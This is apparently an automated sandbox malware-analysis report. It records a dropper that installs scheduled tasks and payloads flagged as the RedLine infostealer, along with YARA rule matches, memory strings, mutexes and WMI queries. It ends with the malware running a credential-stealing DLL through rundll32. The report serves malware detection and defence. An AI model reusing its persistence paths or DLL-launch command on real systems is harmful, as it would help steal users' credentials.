                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                              Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/4P8.
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/=
                              Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 
0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: MPGPH131.exe, 0000001D.00000002.3260917756.0000000007DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 
0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/
                              Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/efox/)P
                              Source: c884f8452a.exe, 00000014.00000003.2983852225.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2980828476.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2967717535.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2990613852.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2968806377.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2977343403.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2985210515.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2979590771.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2961847631.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2972083170.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963538373.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2970867053.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2974258010.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2982109651.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2976229869.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F43000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3045621635.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 
0000001C.00000003.3047540207.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3061893476.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3051616013.0000000007CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/irefox
                              Source: 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account7
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountA
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountJ
                              Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086571979.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3085650788.0000000003780000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3086442731.00000000037A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountL
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountM)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountT)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountd
                              Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountfmF(
                              Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountp
                              Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _WINAPI_GETRAWINPUTDATAmemstr_3557b1e0-b

                              System Summary

                              Source: dump.pcap, type: PCAP, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                              Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED, Matched rule: Windows_Trojan_RedLineStealer_f54632eb, Author: unknown
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED, Matched rule: Detects RedLine infostealer, Author: ditekSHen
                              Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4225168b-d
                              Source: 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_529da930-c
                              Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8b2b90e1-e
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name:
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: .idata
                              Source: explorha.exe.0.drStatic PE information: section name:
                              Source: explorha.exe.0.drStatic PE information: section name: .idata
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert[1].exe.6.drStatic PE information: section name: .idata
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name: .idata
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name: .idata
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name: .idata
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name: .idata
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name: .idata
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name: .idata
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name: .idata
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Windows\Tasks\explorha.job
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile created: C:\Windows\Tasks\chrosha.job
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B85DC80_2_00B85DC8
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00BCA2200_2_00BCA220
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B84E600_2_00B84E60
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0074A2202_2_0074A220
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007443302_2_00744330
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007394E32_2_007394E3
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00748DBB2_2_00748DBB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00704E602_2_00704E60
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007486692_2_00748669
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00748EDB2_2_00748EDB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_007447C82_2_007447C8
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0074A2203_2_0074A220
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007443303_2_00744330
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007394E33_2_007394E3
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00748DBB3_2_00748DBB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00704E603_2_00704E60
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007486693_2_00748669
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00748EDB3_2_00748EDB
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_007447C83_2_007447C8
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848CC77F811_2_00007FF848CC77F8
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A680914_2_003A6809
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A707B14_2_003A707B
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003660E014_2_003660E0
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A24D014_2_003A24D0
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A296814_2_003A2968
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0036CE0014_2_0036CE00
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A7EB014_2_003A7EB0
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0036831014_2_00368310
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_003A6F5B14_2_003A6F5B
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0039778014_2_00397780
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: String function: 00B99750 appears 122 times
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 00719750 appears 244 times
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0071F620 appears 36 times
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: Section: ZLIB complexity 0.9975808478552279
                              Source: explorha.exe.0.drStatic PE information: Section: ZLIB complexity 0.9975808478552279
                              Source: amert[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9977240444214877
                              Source: amert[1].exe.6.drStatic PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
                              Source: amert.exe.6.drStatic PE information: Section: ZLIB complexity 0.9977240444214877
                              Source: amert.exe.6.drStatic PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
                              Source: random[1].exe0.6.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: c884f8452a.exe.6.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: sarra[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9915469146238377
                              Source: chrosha.exe.14.drStatic PE information: Section: ZLIB complexity 0.9977240444214877
                              Source: chrosha.exe.14.drStatic PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
                              Source: RageMP131.exe.20.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: MPGPH131.exe.20.drStatic PE information: Section: ZLIB complexity 0.9915700285291631
                              Source: amert.exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: chrosha.exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: amert[1].exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@106/196@19/15
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227
                              Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:64:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5596
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4012
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3436
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Users\user\AppData\Local\Temp\09fd851a4f
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile read: C:\Users\desktop.ini
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
